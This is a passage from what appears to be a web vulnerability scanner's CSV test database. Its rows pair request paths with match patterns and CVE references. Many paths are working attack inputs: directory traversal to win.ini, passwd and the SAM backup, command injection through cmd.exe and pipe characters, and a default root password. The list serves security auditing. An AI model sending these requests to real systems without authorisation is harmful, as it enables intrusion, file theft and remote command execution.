file system paths when requesting DOS devices with bad syntax.\",\"\",\"\"\n\"000426\",\"CVE-2002-0407\",\"3\",\"@CGIDIRScom5.pl\",\"GET\",\"BODY:Execution of Perl script\",\"Lotus reveals file system paths when requesting DOS devices with bad syntax.\",\"\",\"\"\n\"000428\",\"\",\"3\",\"/?OpenServer\",\"GET\",\"BODY:\\/icons\\/abook\\.gif\",\"This install allows remote users to enumerate DB names.\",\"\",\"\"\n\"000431\",\"CVE-2000-0021\",\"3\",\"/cgi-bin/testing_whatever\",\"GET\",\"BODY:domino\\/cgi\\-bin\",\"The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.\",\"\",\"\"\n\"000436\",\"\",\"3\",\"/LOGIN.PWD\",\"GET\",\"CODE:200\",\"MIPCD password file with unencrypted passwords. MIPDCD should not have the web interface enabled.\",\"\",\"\"\n\"000437\",\"\",\"3\",\"/USER/CONFIG.AP\",\"GET\",\"CODE:200\",\"MIPCD configuration information. MIPCD should not have the web interface enabled.\",\"\",\"\"\n\"000438\",\"\",\"3\",\"@CGIDIRSmail\",\"GET\",\"CODE:200\",\"Simple Perl mailing script to send form data to a pre-configured email address\",\"\",\"\"\n\"000439\",\"\",\"3\",\"@CGIDIRSnph-error.pl\",\"GET\",\"CODE:200\",\"Gives more information in error messages\",\"\",\"\"\n\"000440\",\"\",\"3\",\"@CGIDIRSpost-query\",\"POST\",\"BODY:MYDATA\",\"Echoes back result of your POST\",\"MYDATA\",\"\"\n\"000441\",\"\",\"3\",\"@CGIDIRSquery\",\"GET\",\"CODE:200\",\"Echoes back result of your GET\",\"\",\"\"\n\"000442\",\"\",\"3\",\"@CGIDIRStest-cgi.tcl\",\"GET\",\"CODE:200\",\"May echo environment variables or give directory listings\",\"\",\"\"\n\"000443\",\"\",\"3\",\"@CGIDIRStest-env\",\"GET\",\"CODE:200\",\"May echo environment variables or give directory listings\",\"\",\"\"\n\"000444\",\"http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.11220\",\"3\",\"/.perf\",\"GET\",\"BODY:ListenSocket\",\"Contains Netscape/iPlanet server performance information\",\"\",\"\"\n\"000445\",\"CVE-1999-0239\",\"3\",\"/\",\"get\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Fasttrack can give a directory listing if issued 'get' instead of 'GET'\",\"\",\"\"\n\"000446\",\"\",\"3\",\"/\",\"INDEX\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.\",\"\",\"\"\n\"000447\",\"\",\"3\",\"//\",\"GET\",\"BODY:Proxy autoconfig\",\"Proxy auto configuration file retrieved.\",\"\",\"\"\n\"000448\",\"\",\"3\",\"/admin-serv/config/admpw\",\"GET\",\"CODE:200\",\"This file contains the encrypted Netscape admin password. It should not be accessible via the web.\",\"\",\"\"\n\"000449\",\"https://vulners.com/osvdb/OSVDB:39140\",\"3\",\"/test.php%20\",\"GET\",\"BODY:<\\?php\",\"The OmniHTTP install may allow php/shtml/pl script disclosure. Upgrade to the latest version.\",\"\",\"\"\n\"000450\",\"\",\"3\",\"/*.*\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000451\",\"\",\"3\",\"/cgi-bin/cgi_process\",\"GET\",\"CODE:200\",\"WASD reveals a lot of system information in this script. It should be removed.\",\"\",\"\"\n\"000452\",\"\",\"3\",\"/ht_root/wwwroot/-/local/httpd$map.conf\",\"GET\",\"CODE:200\",\"WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000453\",\"\",\"3\",\"/@JUNK(10)\",\"GET\",\"BODY:Document not found \\.\\.\\. \\/\",\"WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000454\",\"\",\"3\",\"/local/httpd$map.conf\",\"GET\",\"CODE:200\",\"WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000455\",\"\",\"3\",\"/tree\",\"GET\",\"CODE:200\",\"WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.\",\"\",\"\"\n\"000456\",\"\",\"3\",\"@CGIDIRSindex.js0x70\",\"GET\",\"BODY:\\\\<\\\\\\%\\\\=\",\"Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.\",\"\",\"\"\n\"000457\",\"https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513\",\"3\",\"/%00/\",\"GET\",\"BODY:(?i)(?:<\\%|directory listing of|index of)\",\"Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher.\",\"\",\"\"\n\"000460\",\"https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513\",\"3\",\"/%2e/\",\"GET\",\"BODY:(?i)(?:<\\%|directory listing of|index of)\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.\",\"\",\"\"\n\"000463\",\"https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513\",\"3\",\"/%2f/\",\"GET\",\"BODY:(?i)(?:<\\%|directory listing of|index of)\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.\",\"\",\"\"\n\"000466\",\"https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513\",\"3\",\"/%5c/\",\"GET\",\"BODY:(?i)(?:<\\%|directory listing of|index of)\",\"Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher.\",\"\",\"\"\n\"000469\",\"https://web.archive.org/web/20171102042459/http://www.securityfocus.com/bid/2513\",\"3\",\"/index.jsp%00x\",\"GET\",\"BODY:(?i)(?:<\\%|directory listing of|index of)\",\"Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k.\",\"\",\"\"\n\"000470\",\"\",\"2\",\"/weblogic\",\"GET\",\"BODY:(?i)(?:index of \\/|directory listing (?:of|for))\",\"Directory indexing found.\",\"\",\"\"\n\"000471\",\"\",\"3\",\"/%a%s%p%d\",\"GET\",\"BODY:\\*s\\?d\",\"Format bug is present & may reveal system path, upgrade to the latest version.\",\"\",\"\"\n\"000472\",\"\",\"3\",\"/index.html%20\",\"GET\",\"BODY:File for URL\",\"Website may reveal file system paths by adding %20 to the end of a legitimate .html request.\",\"\",\"\"\n\"000476\",\"CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html\",\"23\",\"@CGIDIRSorders/orders.txt\",\"GET\",\"CODE:200\",\"The DCShop installation allows credit card numbers to be viewed remotely.\",\"\",\"\"\n\"000480\",\"\",\"3d\",\"@CGIDIRScgitest.exe\",\"GET\",\"CODE:200\",\"This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.\",\"\",\"\"\n\"000481\",\"\",\"6\",\"/examples/servlet/AUX\",\"GET\",\"CODE:200\",\"Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.\",\"\",\"\"\n\"000482\",\"CVE-2003-0169\",\"6\",\"@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html\",\"GET\",\"CODE:200\",\"HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.\",\"\",\"\"\n\"000483\",\"\",\"6\",\"/cfdocs/cfmlsyntaxcheck.cfm\",\"GET\",\"CODE:200&&BODY:not found\",\"Can be used for a DoS on the server by requesting it check all .exe's\",\"\",\"\"\n\"000484\",\"https://raw.githubusercontent.com/sullo/advisory-archives/master/phenoelit.de_dp-300.txt\",\"6\",\"/Config1.htm\",\"GET\",\"CODE:200\",\"This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested.\",\"\",\"\"\n\"000485\",\"MS02-018\",\"6\",\"/contents/extensions/asp/1\",\"GET\",\"CODE:200\",\"The IIS system may be vulnerable to a DOS.\",\"\",\"\"\n\"000486\",\"CVE-2005-1247\",\"6\",\"/WebAdmin.dll?View=Logon\",\"GET\",\"CODE:200\",\"Some versions of WebAdmin are vulnerable to a remote DoS (not tested).\",\"\",\"\"\n\"000487\",\"CVE-2002-0128\",\"6\",\"@CGIDIRSPbcgi.exe?bcgiu4\",\"GET\",\"CODE:200\",\"Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.\",\"\",\"\"\n\"000488\",\"CVE-2002-0128\",\"6\",\"@CGIDIRStestcgi.exe\",\"GET\",\"CODE:200\",\"Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.\",\"\",\"\"\n\"000489\",\"CVE-2002-0128\",\"6\",\"/cgi-win/cgitest.exe\",\"GET\",\"CODE:200\",\"This CGI may allow the server to be crashed remotely.\",\"\",\"\"\n\"000490\",\"https://seclists.org/bugtraq/2002/Jan/176\",\"7\",\"@LFI(nix,url)\",\"GET\",\"@LFI()\",\"The Web_Server_4D is vulnerable to a directory traversal problem.\",\"\",\"\"\n\"000491\",\"\",\"8\",\"/c/winnt/system32/cmd.exe?/c+dir+/OG\",\"GET\",\"BODY:Directory of c\",\"This machine is infected with Code Red, or has Code Red leftovers.\",\"\",\"\"\n\"000492\",\"\",\"8\",\"@CGIDIRSsnorkerz.bat\",\"GET\",\"CODE:200\",\"Arguments passed to DOS CGI without checking\",\"\",\"\"\n\"000493\",\"\",\"8\",\"@CGIDIRSsnorkerz.cmd\",\"GET\",\"CODE:200\",\"Arguments passed to DOS CGI without checking\",\"\",\"\"\n\"000494\",\"\",\"8\",\"/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c\",\"GET\",\"BODY:\\[winnt\\]&&!BODY:Internal server error\",\"Can issue arbitrary commands to host.\",\"\",\"\"\n\"000495\",\"\",\"8\",\"/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c\",\"GET\",\"BODY:The parameter is incorrect&&!BODY:Internal server error\",\"May be able to issue arbitrary commands to host.\",\"\",\"\"\n\"000496\",\"http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc\",\"8\",\"/msadc/samples/adctest.asp\",\"GET\",\"BODY:Remote Data Service\",\"The IIS sample application adctest.asp may be used to remotely execute commands on the server.\",\"\",\"\"\n\"000497\",\"\",\"b\",\"/@JUNK(10)\",\"GET\",\"BODY:SecureIIS application\",\"Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.\",\"\",\"\"\n\"000498\",\"\",\"b\",\"/somethingnotthere.ida\",\"GET\",\"BODY:Rejected\\-By\\-UrlScan\",\"The IIS server is running UrlScan\",\"\",\"\"\n\"000501\",\"\",\"d\",\"/cgi-shl/win-c-sample.exe\",\"GET\",\"CODE:200\",\"win-c-sample.exe has a buffer overflow\",\"\",\"\"\n\"000502\",\"CVE-2002-2006\",\"34\",\"/examples/servlet/TroubleShooter\",\"GET\",\"BODY:TroubleShooter Servlet Output\",\"Tomcat default JSP page reveals system information and may be vulnerable to XSS.\",\"\",\"\"\n\"000503\",\"CVE-2002-0307\",\"8\",\"@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"BODY:uid=\",\"Avenger's News System allows commands to be issued remotely.\",\"\",\"\"\n\"000504\",\"CVE-2002-0307\",\"8\",\"@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah\",\"GET\",\"BODY:uid=\",\"Avenger's News System allows commands to be issued remotely.\",\"\",\"\"\n\"000505\",\"\",\"2\",\"/goform/CheckLogin?login=root&password=tslinux\",\"GET\",\"BODY:MainPageTable\",\"The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.\",\"\",\"\"\n\"000506\",\"CVE‑2002‑1021\",\"5\",\"/[SecCheck]/..%2f../ext.ini\",\"GET\",\"BODY:\\[SERVICES\\]\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"000507\",\"CVE‑2002‑1021\",\"5\",\"/[SecCheck]/..%255c..%255c../ext.ini\",\"GET\",\"BODY:\\[SERVICES\\]\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"000508\",\"CVE‑2002‑1021\",\"5\",\"/[SecCheck]/..%252f..%252f../ext.ini\",\"GET\",\"BODY:\\[SERVICES\\]\",\"BadBlue server is vulnerable to multiple remote exploits.\",\"\",\"\"\n\"000509\",\"\",\"5\",\"/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\winnt\\win.ini\",\"GET\",\"@LFI()\",\"The ColdFusion install allows attackers to read arbitrary files remotely\",\"\",\"\"\n\"000510\",\"\",\"5\",\"/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\windows\\win.ini\",\"GET\",\"@LFI()\",\"The ColdFusion install allows attackers to read arbitrary files remotely\",\"\",\"\"\n\"000511\",\"\",\"5\",\"/.nsf/../Windows/win.ini\",\"GET\",\"@LFI()\",\"This win.ini file can be downloaded.\",\"\",\"\"\n\"000512\",\"MS01-033\",\"5\",\"/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows arbitrary files to be retrieved from the server.\",\"\",\"\"\n\"000513\",\"MS01-033\",\"5\",\"/query.idq?CiTemplate=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows arbitrary files to be retrieved from the server.\",\"\",\"\"\n\"000514\",\"MS01-033\",\"5\",\"/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows arbitrary files to be retrieved from the server.\",\"\",\"\"\n\"000515\",\"MS01-033\",\"5\",\"/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"This allows arbitrary files to be retrieved from the server.\",\"\",\"\"\n\"000516\",\"CVE-2000-0097\",\"5\",\"/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\",\"GET\",\"@LFI()\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.\",\"\",\"\"\n\"000517\",\"CVE-2000-0097\",\"5\",\"/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\",\"GET\",\"BODY:\\[windows\\]\",\"Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.\",\"\",\"\"\n\"000518\",\"\",\"5\",\"/................../config.sys\",\"GET\",\"CODE:200\",\"PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.\",\"\",\"\"\n\"000519\",\"\",\"5\",\"/cfdocs/exampleapp/email/getfile.cfm?filename=@LFI(abs)\",\"GET\",\"@LFI()\",\"Allows an attacker to view arbitrary files\",\"\",\"\"\n\"000520\",\"\",\"5\",\"/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=@LFI(abs)\",\"GET\",\"@LFI()\",\"Allows an attacker to view arbitrary files\",\"\",\"\"\n\"000521\",\"\",\"5\",\"/cfdocs/expeval/exprcalc.cfm?OpenFilePath=@LFI(abs)\",\"GET\",\"@LFI()\",\"Allows an attacker to view arbitrary files.\",\"\",\"\"\n\"000523\",\"CVE-2002-0262\",\"5\",\"/netget?sid=user&msg=300&file=@LFI()\",\"GET\",\"@LFI()\",\"Sybex E-Trainer allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000524\",\"\",\"5\",\"/php/php.exe?c:@LFI(abs,win)\",\"GET\",\"@LFI(),\"Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.\",\"\",\"\"\n\"000525\",\"https://www.exploit-db.com/exploits/22336\",\"5\",\"/phpping/index.php?pingto=www.example.com%20|%20dir%20c:\\\\\",\"GET\",\"BODY:Windows\",\"PHP Ping allows commands to be executed on the remote host.\",\"\",\"\"\n\"000526\",\"CVE-2002-1483\",\"5\",\"/scripts/db4web_c.exe/dbdirname/c%3A%5CWindows/win.ini\",\"GET\",\"@LFI()\",\"The ini file was retrieved by using the db4web executable.\",\"\",\"\"\n\"000527\",\"\",\"5\",\"/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\@LFI(abs,win)\",\"GET\",\"@LFI()\",\"Default scripts can allow arbitrary access to the host.\",\"\",\"\"\n\"000528\",\"CVE-2003-1345\",\"5\",\"/wx/s.dll?d=/Windows/win.ini\",\"GET\",\"@LFI()\",\"WebCollection Plus allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000529\",\"\",\"5\",\"@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0\",\"GET\",\"CODE:200&&BODY:hosts\",\"This CGI allows attackers to view arbitrary files on the host.\",\"\",\"\"\n\"000530\",\"\",\"5\",\"/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Windows/win.ini\",\"GET\",\"@LFI()\",\"The Web_Server_4D is vulnerable to a directory traversal problem.\",\"\",\"\"\n\"000531\",\"CVE-2001-1458\",\"5\",\"/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../Windows/win.ini%00\",\"GET\",\"@LFI()\",\"The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.\",\"\",\"\"\n\"000532\",\"CVE-2002-0466\",\"5\",\"@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\\&Opt=3\",\"GET\",\"BODY:boot\\.ini\",\"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.\",\"\",\"\"\n\"000533\",\"CVE-2002-0466\",\"5\",\"@CGIDIRSstats/statsbrowse.asp?filepath=c:\\&Opt=3\",\"GET\",\"BODY:boot\\.ini\",\"Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.\",\"\",\"\"\n\"000534\",\"\",\"5\",\"@CGIDIRStest.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"BODY:boot\\.ini\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000535\",\"\",\"5\",\"@CGIDIRStst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,\",\"GET\",\"BODY:boot\\.ini\",\"This CGI allows attackers to execute arbitrary commands on the server.\",\"\",\"\"\n\"000536\",\"\",\"5\",\"@CGIDIRSinput.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"BODY:boot\\.ini\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000537\",\"\",\"5\",\"@CGIDIRSinput2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"BODY:boot\\.ini\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000538\",\"\",\"5\",\"/ssi/envout.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\",\"GET\",\"BODY:boot\\.ini\",\"This CGI allows attackers to read files from the server.\",\"\",\"\"\n\"000539\",\"\",\"5\",\"/php/php.exe?c:\\@LFI(abs,win)\",\"GET\",\"@LFI()\",\"The Apache config allows php.exe to be called directly.\",\"\",\"\"\n\"000540\",\"\",\"5\",\"/../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"The remote server allows any system file to be retrieved remotely.\",\"\",\"\"\n\"000541\",\"\",\"5\",\"/../../../../winnt/repair/sam._\",\"GET\",\"CODE:200&&!BODY:Forbidden\",\"Sam backup successfully retrieved.\",\"\",\"\"\n\"000542\",\"\",\"5\",\"/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\.ini\",\"GET\",\"@LFI()\",\"It is possible to read files on the server by adding /../ in front of file name.\",\"\",\"\"\n\"000543\",\"\",\"5\",\"//@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"The server install allows reading of any system file by adding an extra '/' to the URL.\",\"\",\"\"\n\"000545\",\"CVE-2002-0784\",\"5\",\"////./../.../Windows/win.ini\",\"GET\",\"@LFI()\",\"Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de.\",\"\",\"\"\n\"000546\",\"CVE-2000-0234\",\"5\",\"/.cobalt/sysManage/../admin/.htaccess\",\"GET\",\"BODY:AuthName\",\"Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.\",\"\",\"\"\n\"000547\",\"\",\"5\",\"/albums/userpics/Copperminer.jpg.php?cat%20@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retrieval. The product is no longer maintained and should be replaced.\",\"\",\"\"\n\"000548\",\"CVE-2003-0294\",\"5\",\"/autohtml.php?op=modload&mainfile=x&name=@LFI(nix,abs)\",\"GET\",\"@LFI()\",\"php-proxima 6.0 and below allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000549\",\"https://www.tenable.com/plugins/nessus/11795\",\"5\",\"/atomicboard/index.php?location=@LFI(nix)\",\"GET\",\"@LFI()\",\"AtomicBoard v0.6.2 allows remote users to read arbitrary files.\",\"\",\"\"\n\"000550\",\"CVE‑2010‑4867\",\"5\",\"/current/modules.php?mod=fm&file=@LFI(nix)%00&bn=fm_d1\",\"GET\",\"@LFI()\",\"w-agora 4.1.5 allows any file to be retrieved from the remote host.\",\"\",\"\"\n\"000551\",\"https://vulners.com/osvdb/OSVDB:3012\",\"5\",\"/current/index.php?site=demos&bn=@LFI(nix)%00\",\"GET\",\"@LFI()\",\"w-agora 4.1.5 allows any file to be retrieved from the remote host.\",\"\",\"\"\n\"000552\",\"https://seclists.org/bugtraq/2003/Feb/382\",\"5\",\"@TYPO3typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e@LFI(nix,abs)%00\",\"GET\",\"@LFI()\",\"TYPO3 allows any file to be retrieved remotely. Upgrade to the latest version.\",\"\",\"\"\n\"000553\",\"\",\"5\",\"/DomainFiles/*//@LFI(nix)\",\"GET\",\"@LFI()\",\"Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.\",\"\",\"\"\n\"000554\",\"CVE-2002-0879\",\"5\",\"/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\@LFI(abs)\",\"GET\",\"@LFI()\",\"Gafware's CFXImage allows remote users to view any file on the system.\",\"\",\"\"\n\"000558\",\"https://vulners.com/osvdb/OSVDB:2870\",\"5\",\"/index.php?download=@LFI(abs)\",\"GET\",\"@LFI()\",\"Snif 1.2.4 allows any file to be retrieved from the web server.\",\"\",\"\"\n\"000559\",\"CVE‑2002‑2084\",\"5\",\"/index.php?|=@LFI()\",\"GET\",\"@LFI()\",\"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.\",\"\",\"\"\n\"000560\",\"\",\"5\",\"/index.php?page=@LFI()\",\"GET\",\"@LFI()\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)\",\"\",\"\"\n\"000562\",\"CVE‑2002‑2084\",\"5\",\"/index.php?l=forum/view.php&topic=@LFI()\",\"GET\",\"@LFI()\",\"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.\",\"\",\"\"\n\"000563\",\"\",\"5\",\"/jsp/jspsamp/jspexamples/viewsource.jsp?source=@LFI()\",\"GET\",\"@LFI()\",\"Default JRun CGI lets users read any system file.\",\"\",\"\"\n\"000565\",\"\",\"5\",\"/k/home?dir=/&file=@LFI(nix)&lang=kor\",\"GET\",\"@LFI()\",\"Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000566\",\"\",\"5\",\"/nph-showlogs.pl?files=@LFI(nix)&filter=.*&submit=Go&linecnt=500&refresh=0\",\"GET\",\"@LFI()\",\"nCUBE Server Manage 1.0 allows any file to be read on the remote system.\",\"\",\"\"\n\"000567\",\"\",\"5\",\"/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0\",\"GET\",\"@LFI()\",\"nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.\",\"\",\"\"\n\"000568\",\"\",\"5\",\"/phprocketaddin/?page=../../../../../../../../../../Windows/win.ini\",\"GET\",\"@LFI()\",\"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.\",\"\",\"\"\n\"000569\",\"\",\"5\",\"/phpwebfilemgr/index.php?f=@LFI()\",\"GET\",\"@LFI()\",\"phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.\",\"\",\"\"\n\"000570\",\"\",\"5\",\"/phpwebfilemgr/index.php?f=../../../../../../../../../etc\",\"GET\",\"BODY:passwd&&BODY:hosts\",\"phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.\",\"\",\"\"\n\"000571\",\"\",\"5\",\"/phptonuke.php?filnavn=@LFI(abs)\",\"GET\",\"@LFI()\",\"Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.\",\"\",\"\"\n\"000572\",\"\",\"5\",\"/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=@LFI()\",\"GET\",\"@LFI()\",\"NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.\",\"\",\"\"\n\"000573\",\"CVE-2001-0215\",\"5\",\"/ROADS/cgi-bin/search.pl?form=@LFI()%00\",\"GET\",\"@LFI()\",\"The ROADS search.pl allows attackers to retrieve system files.\",\"\",\"\"\n\"000574\",\"\",\"5\",\"/support/common.php?f=0&ForumLang=@LFI()\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read files on the host.\",\"\",\"\"\n\"000575\",\"\",\"5\",\"/viewpage.php?file=@LFI(abs)\",\"GET\",\"@LFI()\",\"PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.\",\"\",\"\"\n\"000576\",\"CVE-2000-1005\",\"5\",\"/Web_Store/web_store.cgi?page=@LFI()%00.html\",\"GET\",\"@LFI()\",\"eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.\",\"\",\"\"\n\"000577\",\"CVE-2002-0926 http://www.wolfram.com\",\"5\",\"/webMathematica/MSP?MSPStoreID=..\\..\\..\\..\\..\\..\\..\\..\\..\\..@LFI(win,abs)&MSPStoreType=image/gif\",\"GET\",\"@LFI()\",\"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version.\",\"\",\"\"\n\"000578\",\"CVE-2002-0926 http://www.wolfram.com\",\"5\",\"/webMathematica/MSP?MSPStoreID=../../../../../../../../../..@LFI(nix,abs)&MSPStoreType=image/gif\",\"GET\",\"@LFI()\",\"Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version.\",\"\",\"\"\n\"000579\",\"CVE-2002-0277\",\"5\",\"@CGIDIRSadmin.cgi?list=@LFI()\",\"GET\",\"@LFI()\",\"Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.\",\"\",\"\"\n\"000580\",\"\",\"5\",\"@CGIDIRS14all.cgi?cfg=@LFI()\",\"GET\",\"@LFI()\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000581\",\"\",\"5\",\"@CGIDIRS14all-1.1.cgi?cfg=@LFI()\",\"GET\",\"@LFI()\",\"Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.\",\"\",\"\"\n\"000582\",\"CVE-2001-0593\",\"5\",\"@CGIDIRSanacondaclip.pl?template=@LFI()\",\"GET\",\"@LFI()\",\"This allows attackers to read arbitrary files from the server.\",\"\",\"\"\n\"000583\",\"\",\"5\",\"@CGIDIRSauktion.cgi?menue=@LFI()\",\"GET\",\"@LFI()\",\"The CGI allows attackers to read arbitrary files remotely.\",\"\",\"\"\n\"000584\",\"\",\"5\",\"@CGIDIRSbigconf.cgi?command=view_textfile&file=@LFI(abs)&filters=\",\"GET\",\"@LFI()\",\"This CGI allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"000585\",\"\",\"5\",\"@CGIDIRSbb-hostsvc.sh?HOSTSVC=@LFI()\",\"GET\",\"@LFI()\",\"Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.\",\"\",\"\"\n\"000586\",\"\",\"5\",\"@CGIDIRSbb-hist?HISTFILE=@LFI()\",\"GET\",\"@LFI()\",\"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.\",\"\",\"\"\n\"000587\",\"\",\"5\",\"@CGIDIRSbb-hist.sh?HISTFILE=@LFI()\",\"GET\",\"@LFI()\",\"Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary 